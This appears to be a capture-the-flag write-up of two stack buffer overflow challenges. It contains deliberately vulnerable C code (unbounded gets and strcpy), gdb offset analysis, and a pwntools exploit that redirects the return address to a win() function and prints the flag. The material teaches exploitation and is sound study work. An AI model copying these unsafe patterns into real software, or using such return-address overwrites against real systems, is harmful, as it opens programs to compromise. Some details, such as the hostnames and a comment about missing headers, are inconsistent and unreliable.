⚔️Buffer Overflow

Buffer Overflow-той холбоотой жишээнүүдийг энэхүү хэсэгт оруулна

#1 Simple BoF

#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define FLAGSIZE_MAX 64   // capacity of the flag buffer, including the terminating NUL

// Global (hence zero-initialised) so that sigsegv_handler() can reach it:
// main() fills it from flag.txt, the handler prints it when the overflow
// in vuln() faults.
char flag[FLAGSIZE_MAX];

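/*
 * SIGSEGV handler: writes the flag (plus a newline) to stdout and terminates
 * with status 1.  Installed by main(); it fires when the unbounded copy in
 * vuln() corrupts the stack far enough to fault.
 *
 * The original body called printf()/fflush()/exit(), none of which are
 * async-signal-safe -- a fault raised while stdio holds its stream lock
 * could deadlock.  write(2) and _exit(2) are async-signal-safe, so the
 * handler uses those instead; the bytes emitted are the same.
 *
 * sig: delivered signal number, unused (only ever SIGSEGV).
 */
void sigsegv_handler(int sig) {
  (void)sig;
  /* flag is NUL-terminated: zero-initialised global filled by fgets() in main(). */
  size_t len = strlen(flag);
  ssize_t r = write(STDOUT_FILENO, flag, len);
  (void)r;  /* nothing sensible to do on a failed write from a fatal-signal handler */
  r = write(STDOUT_FILENO, "\n", 1);
  (void)r;
  _exit(1); /* do not run atexit()/stdio teardown from a signal handler */
}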

/*
 * Copies `input` into a 16-byte stack buffer with no length check.
 *
 * This is the intentional defect of the exercise: strcpy() stops only at the
 * NUL terminator, so any input of 16 or more characters writes past buf2 into
 * the rest of the frame.  main() hands over a buffer that gets() filled from
 * stdin without a bound, so the overflow is reachable from user input.
 * A fixed version would bound the copy, e.g.
 *   snprintf(buf2, sizeof buf2, "%s", input);
 * or reject over-long input before copying.
 */
void vuln(char *input){
  char buf2[16];
  strcpy(buf2, input);  // unbounded copy: overruns buf2 when strlen(input) >= 16
}

/*
 * Challenge entry point: loads the flag, arms the SIGSEGV handler, then
 * reads a line from stdin and passes it to the vulnerable vuln().
 *
 * Review notes on the listing as given:
 *  - the fgets() result is not checked and `f` is never fclose()d;
 *  - gets() has no bound (removed from the language in C11), so buf1 itself
 *    can be overrun before vuln() is even reached;
 *  - getegid()/setresgid() are declared in <unistd.h>, which this listing
 *    does not include.
 */
int main(int argc, char **argv){
  
  FILE *f = fopen("flag.txt","r");
  if (f == NULL) {
    printf("%s %s", "Please create 'flag.txt' in this directory with your",
                    "own debugging flag.\n");
    exit(0);
  }
  
  fgets(flag,FLAGSIZE_MAX,f);   // at most FLAGSIZE_MAX-1 bytes; return value unchecked
  signal(SIGSEGV, sigsegv_handler); // Set up signal handler
  
  // drop any saved/real gid mismatch down to the effective gid
  gid_t gid = getegid();
  setresgid(gid, gid, gid);


  printf("Input: ");
  fflush(stdout);   // prompt must be visible before the blocking read
  char buf1[100];
  gets(buf1);   // unbounded read from stdin
  vuln(buf1);   // overflows buf2[16] for long input; a fault lands in sigsegv_handler()
  printf("The program will exit now\n");
  return 0;
}
┌─[root@kali]─[]
└──╼ $ nc saturn.net 55986
Input: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

#2

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include "asm.h"

#define BUFSIZE 32    // size of the stack buffer gets() writes into in vuln()
#define FLAGSIZE 64   // size of the buffer win() reads flag.txt into

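/*
 * Prints the first line of flag.txt to stdout.
 *
 * Nothing in the program calls this; it is the target that the exploit
 * script on this page redirects vuln()'s return address to.
 *
 * Fixes relative to the original listing:
 *  - printf(buf) used the file contents as the format string, so any '%'
 *    in flag.txt would be parsed as a conversion (format-string bug);
 *    the contents are now printed through "%s";
 *  - the fgets() result is checked, so a short/unreadable file no longer
 *    prints an uninitialised buffer;
 *  - the FILE handle is closed.
 * Exits with status 0 if flag.txt cannot be opened (message unchanged).
 */
void win() {
  char buf[FLAGSIZE];
  FILE *f = fopen("flag.txt","r");
  if (f == NULL) {
    printf("%s %s", "Please create 'flag.txt' in this directory with your",
                    "own debugging flag.\n");
    exit(0);
  }

  if (fgets(buf,FLAGSIZE,f) != NULL) {
    printf("%s", buf);  /* data, not a format string */
  }
  fclose(f);
}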

/*
 * Reads one line from stdin into a 32-byte stack buffer with gets().
 *
 * This is the intended vulnerability of the exercise: gets() has no bound
 * (removed from the language in C11), so a longer line overwrites the saved
 * registers and return address above buf.  In the gdb output on this page
 * the input shows up on the stack at 0xffffd050 and `i f` reports the saved
 * eip at 0xffffd07c -- 44 bytes apart, which is the padding the accompanying
 * script uses.  A fixed version would read with fgets(buf, sizeof buf, stdin).
 *
 * get_return_address() comes from the local "asm.h", not shown on this page;
 * NOTE(review): presumably it returns the saved return address of the current
 * frame, which the printf() below reports -- confirm against asm.h.
 */
void vuln(){
  char buf[BUFSIZE];
  gets(buf);   // unbounded read: the overflow happens here

  printf("Okay, time to return... Fingers Crossed... Jumping to 0x%x\n", get_return_address());
}

/*
 * Challenge entry point: makes stdout unbuffered, normalises the gid, prints
 * the prompt and calls the vulnerable vuln().  win() is never called from
 * here -- it is only reachable by corrupting vuln()'s return address.
 */
int main(int argc, char **argv){

  setvbuf(stdout, NULL, _IONBF, 0);   // unbuffered: output is visible even if the process crashes afterwards
  
  gid_t gid = getegid();
  setresgid(gid, gid, gid);

  puts("Please enter your string: ");
  vuln();   // returns normally only if the input fits the 32-byte buffer
  return 0;
}
┌─[root@kali]─[bof_1]
└──╼ $ checksec vuln
[*] '/bof_1'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments
gef➤  p win
$1 = {<text variable, no debug info>} 0x80491f6 <win>
gef➤  r
Starting program: /bof_1/vuln 
Please enter your string: 
AAAAAAAA

...
gef➤  search-pattern AAAAAAAA
[+] Searching 'AAAAAAAA' in memory
[+] In '[heap]'(0x804d000-0x806f000), permission=rwx
  0x804d1a0 - 0x804d1aa  →   "AAAAAAAA\n" 
[+] In '[stack]'(0xfffdd000-0xffffe000), permission=rwx
  0xffffd050 - 0xffffd058  →   "AAAAAAAA" 
gef➤  i f
Stack level 0, frame at 0xffffd080:
 eip = 0x80492a3 in vuln; saved eip = 0x804932f
 called by frame at 0xffffd0b0
 Arglist at 0xffffd03c, args: 
 Locals at 0xffffd03c, Previous frame's sp is 0xffffd080
 Saved registers:
  ebx at 0xffffd074, ebp at 0xffffd078, eip at 0xffffd07c
# pwntools script for challenge #2, kept as on the page; the comments explain
# each step against the gdb/checksec output above.
from pwn import *

elf = ELF('./vuln')   # loads the local binary (pwntools prints its checksec summary, see the run below)
libc = elf.libc       # resolved but not used by this script

# `python3 bof1.py REMOTE` talks to the challenge server, otherwise the local binary is run
if args.REMOTE:
    p = remote('saturn.net',61406)
else:
    p = process(elf.path)

# payload buffer
# 44 bytes of padding cover the distance from buf (0xffffd050 in the
# search-pattern hit) to the saved eip (0xffffd07c in `i f`); the next
# 4 bytes replace it with the address of win() reported by `p win`,
# packed little-endian for i386.
payload = b'A'*44
payload += p32(0x80491f6)

print(p.recvuntil(':'))   # consume the "Please enter your string:" prompt first
p.send(payload)
p.interactive()           # hand the connection over so win()'s output can be read
┌─[root@kali]─[/bof_1]
└──╼ $ python3 bof1.py REMOTE
[*] '/bof_1'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments
[*] '/usr/lib32/libc-2.31.so'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Opening connection to saturn.picoctf.net on port 61406: Done
b'Please enter your string:'
[*] Switching to interactive mode

$ 
Okay, time to return... Fingers Crossed... Jumping to 0x80491f6
CTF{addr3ss3s_ar3_3asy_60fac6aa}
[*] Got EOF while reading in interactive
